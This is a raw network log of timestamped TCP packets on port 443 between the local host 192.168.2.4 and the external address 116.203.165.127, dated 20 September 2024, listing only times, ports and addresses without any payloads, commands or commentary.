Sep 20, 2024 11:07:44.147438049 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.152735949 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.152765036 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.152836084 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.152841091 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.152869940 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.152894974 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.161601067 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.161645889 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.161691904 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.161696911 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.161751986 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.171406031 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.171452045 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.171519995 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.171525002 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.171566963 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.180177927 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.180202007 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.180293083 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.180304050 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.180360079 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.187252998 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.187318087 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.187367916 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.187380075 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.187428951 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.187428951 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.198383093 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.198415041 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.198527098 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.198571920 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.198636055 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.215877056 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.215920925 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.216001034 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.216018915 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.216063976 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.216084003 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.234525919 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234587908 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234626055 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.234631062 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234699011 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.234702110 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234731913 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234750032 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.234776974 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.234781027 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234826088 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.234880924 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.234931946 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.242257118 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.242274046 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.243207932 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.243263006 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.243335962 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.252489090 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.252505064 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.932681084 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.932774067 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.933284044 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.933295965 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.935206890 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.935214043 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.371221066 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.371258974 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.371282101 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.371290922 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.371335983 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.371346951 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.371388912 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.403043985 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.403120995 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.403176069 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.403188944 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.403213978 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.403233051 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.471662045 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.471692085 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.471790075 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.471810102 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.471844912 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.497875929 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.497904062 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.498001099 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.498011112 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.498051882 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.534128904 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.534151077 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.534225941 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.534235001 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.534277916 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.560978889 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.561002016 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.561099052 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.561106920 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.561145067 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.589333057 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.589354038 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.589390993 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.589399099 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.589447975 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.604440928 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.604475975 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.604509115 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.604517937 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.604547024 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.604566097 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.621592999 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.621614933 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.621664047 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.621670961 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.621716022 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.638268948 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.638290882 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.638345003 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.638353109 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.638384104 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.651352882 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.651376963 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.651407957 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.651415110 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.651433945 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.651457071 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.667011023 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.667032003 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.667083025 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.667089939 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.667099953 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.667123079 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.681236029 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.681257963 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.681303024 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.681308031 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.681344032 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.693007946 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.693031073 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.693064928 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.693070889 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.693092108 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.693108082 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.703869104 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.703891039 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.703950882 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.703957081 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.703977108 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.703994036 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.712209940 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.712229013 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.712330103 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.712337017 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.712373018 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.721775055 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.721796036 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.721847057 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.721854925 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.721879005 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.721898079 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.730575085 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.730595112 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.730654001 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.730662107 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.730694056 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.741244078 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.741265059 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.741369009 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.741377115 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.741413116 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.754379988 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.754403114 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.754491091 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.754503965 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.754537106 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.767013073 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.767035961 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.767097950 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.767105103 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.767127991 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.767147064 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.780905008 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.780925035 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.781037092 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.781044006 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.781089067 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.791177034 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.791198969 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.791277885 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.791285038 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.791317940 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.802321911 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.802342892 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.802397013 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.802403927 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.802431107 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.802448034 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.811335087 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.811357021 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.811404943 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.811412096 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.811434031 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.811450958 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.818727970 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.818749905 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.818803072 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.818808079 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.818826914 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.818844080 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.828718901 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.828742027 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.828823090 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.828829050 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.828870058 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.834578991 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.834645987 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.834650993 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.834662914 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.834682941 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.834712029 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.834891081 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.834903955 CEST	443	49751	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.834913969 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.834959030 CEST	49751	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.835777998 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.835819006 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:45.835885048 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.836148977 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:45.836159945 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.481993914 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.482079029 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.482501030 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.482507944 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.484438896 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.484442949 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.908796072 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.908828974 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.908849955 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.908870935 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.908904076 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.908912897 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.908961058 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.939863920 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.939898968 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.939982891 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.939992905 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:46.940021038 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:46.940031052 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.006794930 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.006829023 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.006887913 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.006905079 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.006932020 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.006951094 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.036966085 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.036997080 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.037062883 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.037092924 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.037106037 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.037134886 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.075053930 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.075125933 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.075156927 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.075171947 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.075195074 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.075215101 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.105432034 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.105478048 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.105541945 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.105562925 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.105577946 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.105607986 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.124452114 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.124497890 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.124582052 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.124607086 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.124624968 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.124646902 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.142272949 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.142318964 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.142431021 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.142455101 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.142597914 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.159861088 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.159893036 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.160224915 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.160249949 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.160348892 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.174179077 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.174206018 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.174444914 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.174469948 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.174591064 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.191373110 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.191462994 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.191554070 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.191575050 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.191612959 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.191673994 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.204848051 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.204894066 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.204968929 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.204987049 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.205080986 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.220514059 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.220561028 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.220637083 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.220660925 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.220705032 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.220766068 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.231651068 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.231754065 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.231781006 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.231803894 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.231889963 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.240691900 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.240735054 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.240803957 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.240827084 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.240865946 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.240922928 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.248780012 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.248835087 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.248895884 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.248917103 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.248965979 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.248992920 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.249059916 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.249739885 CEST	49752	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.249757051 CEST	443	49752	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.251713991 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.251749992 CEST	443	49753	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:47.251873970 CEST	49753	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:47.252516985 CEST	49753	443	192.168.2.4	116.203.165.127
